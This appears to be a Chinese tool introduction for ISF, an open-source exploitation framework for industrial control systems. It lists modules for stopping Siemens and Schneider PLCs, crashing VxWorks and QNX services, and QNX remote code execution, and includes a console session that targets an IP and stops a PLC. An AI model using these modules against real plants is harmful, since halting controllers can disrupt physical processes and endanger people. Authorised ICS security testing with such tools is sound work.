今天给大家介绍一款名叫ISF的工具,它是一款针对工业控制系统的漏洞利用框架。该工具基于开源项目routersploit,采用Python语言开发,它跟MetaSploit框架有些相似,希望大家能够喜欢。
ICS(工业控制系统)协议客户端
| 名称 | 路径 | Description |
| modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP客户端 |
| wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC Version 2 客户端(Vxworks 6.x) |
| s7_client | icssploit/clients/s7_client.py | s7comm 客户端(S7 300/400 PLC) |
漏洞利用模块
| Name | Path | Description |
| s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC 启动/停止 |
| vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC 远程DoS(
CVE-2015-7599) |
| quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Schneider Quantum 140系列 PLC启动/停止 |
| crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | Crash QNX Inetd TCP服务 |
| qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | QNX QCONN 远程代码执行 |
扫描器模块
| Name | Path | Description |
| profinet-dcp-scan | scanners/profinet-dcp-scan.py | Profinet DCP 扫描器 |
| vxworks_6_scan | scanners/vxworks_6_scan.py | Vxworks 6.x 扫描器 |
| s7comm_scan | scanners/s7comm_scan.py | S7comm 扫描器 |
ICS协议模块(采用Scapy编写)
这些协议模块能够与其他的模糊测试框架(例如Kitty)进行整合,或者你也可以将其用于开发属于你自己的客户端工具。
| Name | Path | Description |
| pn_dcp |
icssploit/protocols/pn_dcp | Profinet DCP Protocol |
| modbus_tcp | icssploit/protocols/modbus_tcp | Modbus TCP Protocol |
| wdbrpc2 | icssploit/protocols/wdbrpc2 | WDB RPC Version 2 Protocol |
| s7comm | icssploit/protocols/s7comm.py | S7comm Protocol |
框架安装
Python依赖环境
gnureadline(OSX only)
requests
paramiko
beautifulsoup4
pysnmp
python-nmap
scapy
在Kali Linux中安装
安装命令如下所示:
git clone https://github.com/dark-lbp/isf/cd isf
python isf.py
工具使用
root@kali:~/Desktop/temp/isf#python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______ |_ _/ ____|/ ____/ ____| __ \|| / __ \_ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | \___ \\___ \| ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|_____\_____|_____/_____/|_| |______\____/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
漏洞利用
isf> use exploits/plcs/exploits/plcs/siemens/ exploits/plcs/vxworks/
isf> use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf> use exploits/plcs/siemens/s7_300_400_plc_control
isf(S7-300/400 PLC Control) >
注意事项:用户可使用Tab键实现命令补全。
选项
显示模块选项:
isf(S7-300/400 PLC Control) > show options
Targetoptions:
Name Current settings Description
---- ---------------- -----------
target Target address e.g.192.168.1.1
port 102 Target Port
Moduleoptions:
Name Current settings Description
---- ---------------- -----------
slot 2 CPU slotnumber.
command 1 Command0:start plc, 1:stop plc.
isf(S7-300/400 PLC Control) >
设置选项:
isf(S7-300/400 PLC Control) > set target 192.168.70.210[+]{'target': '192.168.70.210'}
执行模块:
isf(S7-300/400 PLC Control) > run
[*]Running module...
[+]Target is alive
[*]Sending packet to target
[*]Stop plc
isf(S7-300/400 PLC Control) >
显示模块信息:
isf(S7-300/400 PLC Control) > show info
Name:S7-300/400PLC Control
Description:UseS7comm command to start/stop plc.
Devices:- Siemens S7-300 and S7-400 programmable logiccontrollers (PLCs)
Authors:- wenzhe zhu
References:
isf(S7-300/400 PLC Control) >
工具文档
1.Modbus-TCP客户端工具使用说明
2.WDBRPCV2客户端工具使用说明
3.S7客户端工具使用说明
4.SNMP爆破工具使用说明
5.S7 300/400 PLC 密码爆破工具使用说明
6.Vxworks 6.x 扫描器使用说明
7.Profient DCP 扫描使用说明
8.S7comm PLC 扫描器使用说明
9.从额外的目录中读取modules
10.如何创建一个module
文章出处:FreeBuf
漏洞预警:Spring Boot框架表达式注入漏洞
